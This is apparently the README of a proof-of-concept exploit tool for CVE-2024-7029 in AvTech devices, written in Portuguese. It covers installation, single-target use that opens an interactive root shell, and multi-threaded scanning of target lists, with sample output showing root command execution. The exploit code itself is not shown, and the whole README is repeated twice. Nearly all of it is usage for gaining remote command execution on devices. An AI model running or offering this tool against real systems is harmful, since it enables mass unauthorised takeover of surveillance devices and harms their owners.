
Um exploit de PoC para a vulnerabilidade CVE-2024-7029 encontrada em dispositivos AvTech, permitindo Execução Remota de Código (RCE)
GenAvTechRCEExploit Uma prova de conceito de exploit para a vulnerabilidade CVE-2024-7029 encontrada em dispositivos AvTech, permitindo Execução Remota de Código (RCE). Esta ferramenta pode escanear dispositivos vulneráveis e executar comandos neles de forma interativa.
requestsprompt_toolkitalive_progressInstale as bibliotecas necessárias com:
pip install -r requirements.txt
Para verificar um único alvo quanto à vulnerabilidade e iniciar um shell interativo:
python3 GenAvTechRCEExploit.py -u <url_alvo>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Verificando vulnerabilidade do alvo...
[+] Vulnerabilidade encontrada no alvo: http://192.168.1.100
[*] Iniciando shell interativo...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Encerrando shell interativo
Substitua <url_alvo> pela URL real do dispositivo alvo.
Para escanear múltiplos alvos fornecidos em um arquivo (uma URL por linha):
python3 GenAvTechRCEExploit.py -f <caminho_arquivo>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Vulnerabilidade encontrada no alvo: http://192.168.1.50
[+] Vulnerabilidade encontrada no alvo: http://192.168.1.150
[-] Alvo http://192.168.1.200 não está vulnerável
Substitua <caminho_arquivo> pelo caminho para seu arquivo contendo URLs de alvos.
Você pode especificar o número de threads para o escaneamento com a opção -t:
python3 GenAvTechRCEExploit.py -f <caminho_arquivo> -t <número_de_threads>
Por padrão, o número de threads é definido como 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
GenAvTechRCEExploit - uma prova de conceito de exploit para CVE-2024-7029 em dispositivos AvTech, permitindo execução remota de código (RCE). Esta ferramenta pode escanear dispositivos vulneráveis e executar comandos neles de forma interativa.
requestsprompt_toolkitalive_progressInstale as bibliotecas necessárias com:
pip install -r requirements.txt
Para verificar a vulnerabilidade de um único alvo e iniciar um shell interativo:
python3 GenAvTechRCEExploit.py -u <url_alvo>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Verificando vulnerabilidade do alvo...
[+] Vulnerabilidade encontrada no alvo: http://192.168.1.100
[*] Iniciando shell interativo...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Encerrando shell interativo
Substitua <url_alvo> pela URL real do dispositivo alvo.
Para escanear vários alvos especificados em um arquivo (uma URL por linha):
python3 GenAvTechRCEExploit.py -f <caminho_arquivo>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Vulnerabilidade encontrada no alvo: http://192.168.1.50
[+] Vulnerabilidade encontrada no alvo: http://192.168.1.150
[-] Alvo http://192.168.1.200 não está vulnerável
Substitua <caminho_arquivo> pelo caminho para o arquivo contendo URLs de alvos.
Você pode especificar o número de threads para o escaneamento com a opção -t:
python3 GenAvTechRCEExploit.py -f <caminho_arquivo> -t <número_de_threads>
Por padrão, o número de threads é definido como 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20